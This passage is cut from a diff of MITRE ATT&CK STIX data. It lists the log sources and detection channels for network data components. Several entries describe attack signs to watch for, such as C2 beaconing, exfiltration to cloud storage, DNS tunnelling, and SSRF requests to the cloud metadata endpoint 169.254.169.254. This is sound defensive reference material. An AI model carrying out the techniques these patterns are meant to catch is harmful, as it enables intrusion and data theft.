+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "encrypted outbound traffic carrying unexpected application data"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Persistent outbound connections with consistent periodicity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "TLS connections with abnormal handshake sequence or self-signed cert"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Web server process initiating outbound TCP connections not tied to normal server traffic"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound TLS connections to cloud storage providers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound HTTPS connections to cloud storage APIs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process, network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process = 'ssh' OR eventMessage CONTAINS 'ssh'"
+                        },
+                        {
+                            "name": "Netfilter/iptables",
+                            "channel": "Forwarded packets log"
+                        },
+                        {
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "networkconfig ",
+                            "channel": "interface flag PROMISC, netstat | ip link | ethtool"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "NAT table modification (add/update/delete rule)"
+                        },
+                        {
+                            "name": "networkdevice:IDS",
+                            "channel": "content inspection / PCAP / HTTP body"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "ACL/Firewall rule modification or new route injection"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config change (e.g., logging buffered, pcap buffers)"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Authentication failures, unexpected community string usage, or unauthorized SNMPv1/v2 requests"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Authentication failures or unusual community string usage in SNMP queries"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Symmetric encryption detected without TLS handshake sequence"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "TLS handshake + HTTP headers"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Abnormal certificate chains or non-standard ports carrying TLS"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Unusual POST requests to admin or upload endpoints"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns"
+                        },
+                        {
+                            "name": "NSM:Content",
+                            "channel": "SSL Certificate Metadata"
+                        },
+                        {
+                            "name": "NSM:Content",
+                            "channel": "HTTP Header Metadata"
+                        },
+                        {
+                            "name": "NSM:Content",
+                            "channel": "TLS Fingerprint and Certificate Analysis"
+                        },
+                        {
+                            "name": "NSM:Content",
+                            "channel": "Traffic on RPC DRSUAPI"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "TLS/HTTP inspection"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "High rate of inbound TCP SYN or ACK packets with missing 3-way handshake completion"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Anomalous TCP SYN or ACK spikes from specific source or interface"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Outbound encrypted traffic"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "ICMP/UDP protocol anomaly"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mqtt.log / xmpp.log (custom log feeds)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mqtt.log or AMQP custom log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mqtt.log, xmpp.log, amqp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP/UDP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP session tracking"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Captured packet payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "session behavior"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "External C2 channel over TLS"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http/file-xfer: Inbound/outbound transfer of ELF shared objects"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, files.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "unexpected network activity initiated shortly after shell session starts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP/WebDAV requests that contain NTLMSSP or PROPFIND/MOVE/OPTIONS with Authorization: NTLM"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SPAN or port-mirrored HTTP/S"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, ssl.log, websocket.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Browser connections to known C2 or dynamic DNS domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Session History Reset"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP "
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "query: High-volume LDAP traffic with filters targeting groupPolicyContainer attributes"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP/TLS Logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious URL patterns, uncommon TLDs, short-lived domains, URL shorteners; HTTP method GET/POST"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious URL patterns, uncommon TLDs, URL shorteners"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious GET/POST; downloader patterns"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SSH logins or scp activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "remote login and transfer"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious long-lived or reattached remote desktop sessions from unexpected IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP payloads with SQLi/LFI/JNDI/deserialization indicators"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "outbound egress from web host after suspicious request"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Requests towards cloud metadata or command & control from pod IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connections to TCP 427 (SLP) or vCenter web services from untrusted sources"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "NetFlow/sFlow for odd egress to Internet from mgmt plane"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "packet capture or DPI logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SMB2_LOGOFF/SMB_TREE_DISCONNECT"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unusual Base64-encoded content in URI, headers, or POST body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Base64 strings or gzip in URI, headers, or POST body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound connections to 445, 3389, 5985-5986 with high error/connection-reset rate, followed by new outbound sessions from the same host to internal assets within short interval."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound connections to monitored service ports from external or unusual internal sources; rapid follow-on lateral connections from the same host."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound to tcp/427 (OpenSLP), tcp/443 (vSphere APIs), tcp/902, tcp/5989 followed by new unexpected outbound sessions from the ESXi/vCenter host."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound to 22/5900/8080 and follow-on internal connections."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP body or headers contain long Base64 sections; gzip/deflate + Base64"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP body contains long Base64 sections"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: Base64/MIME looking payloads from ESXi host IP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "LDAP Bind/Search"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "LDAP Query"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "smtp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "smtp.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "remote CLI session detection"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, ftp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "PCAP inspection"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large HTTPS POST requests to webhook endpoints"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Single, low-volume inbound packet (REJ/S0/OTH or uncommon dport/protocol) from src_ip followed by outbound SF connection to src_ip."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Rare inbound packet characteristics (ICMP/UDP/TCP to uncommon port) from src_ip followed \u2264TimeWindow by outbound SF from same host to src_ip."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound one-off packet to uncommon port \u2192 outbound SF to same src_ip within TimeWindow."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large upload to firmware interface port or path"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.request: HTTP requests and responses for specific script resources, unexpected content-types (application/octet-stream for script URLs), suspicious referrers, or obfuscated javascript resources"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::response: HTTP responses with suspicious content-type for scripts, long obfuscated javascript bodies, or redirects to exploit kit domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP/HTTPS requests for script resources flagged by content inspection (excessive obfuscation, eval usage, unusual redirects)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log + http.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http/file-xfer: Outbound transfer of large video-like MIME types soon after capture"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound SCP, TFTP, or FTP sessions carrying configuration file content"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Session Transfer Content"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Captured File Content"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "C2 exfiltration"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Transferred file observations"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::post: Outbound HTTP POST from host shortly after DB export activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPS API requests to Dropbox, iCloud, Google Drive, OneDrive shortly after DB tool usage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Observed downgrade in negotiated cipher suites or TLS/SSH versions across sessions"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New egress from container IP/namespace to Internet or non-approved CIDRs/ASNs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New VM egress to crypto-mining pools or non-approved Internet ranges within minutes of boot"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::request: Network connection to package registry or C2 from interpreter shortly after install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::request: Outbound HTTP initiated by Python interpreter"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "DrsAddEntry, DrsReplicaAdd, GetNCChanges calls between non-DC and DCs."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large HTTPS POST requests to text storage domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected ARP replies or DNS responses inconsistent with authoritative servers"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TLS downgrade or inconsistent DNS answers"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unusual request pattern leading up to service crash (e.g., malformed or oversized payload)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log or http.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP bodies/headers contain long tokens with non-standard alphabets or constant-size periodic POSTs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "dns: DNS labels with excessive length and restricted custom alphabets (e.g., base36 only) repeated frequently"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: suspicious long tokens with custom alphabets in body/headers"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP bodies from ESXi host IPs containing long, non-standard tokens"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Traffic patterns showing downgrade from strong encryption (AES-256) to weaker or plaintext protocols"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP(S) requests with User-Agents typical of PowerShell or curl from desktop; or URIs matching paste-inspired payload hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Egress to non-approved networks from host after terminal exec"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow/PCAP analysis for outbound payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log + files.log + ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPS or custom protocol traffic with large payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected script or binary content returned in HTTP response body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Injected content responses with unexpected script/malware signatures"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Content injection observed in HTTPS responses with mismatched certificates or altered payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Relay patterns across IP hops"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ldap.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Probe responses from unauthorized APs responding to client probe requests"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Excessive gratuitous ARP replies on local subnet"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound HTTP POST with suspicious payload size or user-agent"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "POST requests to .php, .jsp, .aspx files with high entropy body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "dns.log"
+                        },
+                        {
+                            "name": "NSM:FLow",
+                            "channel": "dns.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Encrypted tunnels or proxy traffic to non-standard destinations"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large transfer from management IPs to unauthorized host"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Sustained abnormal inbound request rate targeting application ports (e.g., 80/443/25)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ftp.log, smb_files.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ftp.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mirror/SPAN port"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ftp.log, conn.log, smb_files.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SSL/TLS Inspection or PCAP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log, ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http, dns, smb, ssl logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "dns, ssl, conn"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log, http.log, dns.log, ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ICMP/UDP traffic (Wireshark, Suricata, Zeek)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "icmp.log, weird.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ICMP/UDP monitoring (tcpdump, Wireshark, Zeek)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unusual responses to LLMNR (UDP 5355) or NBT-NS (UDP 137) queries from unauthorized hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "DHCP OFFER or ACK with unauthorized DNS/gateway parameters"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Multiple DHCP OFFER responses for a single DISCOVER"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SSL/TLS Handshake Analysis"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP Header Metadata"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Network Capture TLS/HTTP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "container egress to unknown IPs/domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP Request Logging"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssh connections originating from third-party CIDRs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssh/smb connections to internal resources from third-party devices"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Degraded encryption throughput or switch to weaker cipher suites compared to historical baselines"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log (for TLS handshake analysis), dns.log (tunneling indicators)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "host switch egress data"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound HTTP/S"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log - Certificate Analysis"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log, x509.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Packets with unusual flags or payloads outside established flows (e.g., WoL magic FF\u00d76 + 16\u00d7MAC)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious POSTs to upload endpoints"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Traffic spike preceding control crash"
+                        },
+                        {
+                            "name": "NSM:Inspection",
+                            "channel": "TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation"
+                        },
+                        {
+                            "name": "NSM:Inspection",
+                            "channel": "TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect"
+                        },
+                        {
+                            "name": "saas:box",
+                            "channel": "API calls exceeding baseline thresholds"
+                        },
+                        {
+                            "name": "saas:confluence",
+                            "channel": "REST API access from non-browser agents"
+                        },
+                        {
+                            "name": "TelecomLogs:SS7Signaling",
+                            "channel": "Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns"
+                        },
+                        {
+                            "name": "TelecomLogs:SS7Signaling",
+                            "channel": "Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception"
+                        },
+                        {
+                            "name": "WebProxy:AccessLogs",
+                            "channel": "SSRF-like patterns accessing metadata endpoint through proxy (e.g., Host: 169.254.169.254)"
+                        },
+                        {
+                            "name": "WIDS:AssociationLogs",
+                            "channel": "Unauthorized AP or anomalous MAC address connection attempts"
+                        },
+                        {
+                            "name": "WinEventLog:iis",
+                            "channel": "IIS Logs"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
+                            "channel": "Unusual external domain access"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "Outbound requests with forged tokens/cookies in headers"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=5005 (WLAN), EventCode=302 (Bluetooth)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.771000+00:00\", \"old_value\": \"2026-04-22 14:48:50.367000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.777000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0078",
+                            "external_id": "DC0078"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Network Traffic Flow",
+                    "description": "Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "socket_events"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected flows between segmented networks or prohibited ports"
+                        },
+                        {
+                            "name": "snmp:config",
+                            "channel": "Configuration change traps or policy enforcement failures"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time outbound connections to package registries or unknown hosts immediately after restore/build"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to new registries/CDNs post-install/build"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to non-approved registries after dependency install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connections to TCP 139,445 and HTTP/HTTPS to WebDAV endpoints from workstation subnets"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large outbound data flows or long-duration connections"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "egress > 90th percentile or frequent connection reuse"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "esxcli network vswitch or DNS resolver configuration updates"
+                        },
+                        {
+                            "name": "esxi:vobd",
+                            "channel": "Network Events"
+                        },
+                        {
+                            "name": "iptables:LOG",
+                            "channel": "TCP connections"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection metadata"
+                        },
+                        {
+                            "name": "wineventlog:dhcp",
+                            "channel": "DHCP Lease Granted"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "LEASE_GRANTED"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "MAC not in allow-list acquiring IP (DHCP)"
+                        },
+                        {
+                            "name": "Windows Firewall Log",
+                            "channel": "SMB over high port"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Internal connection logging"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "pf firewall logs"
+                        },
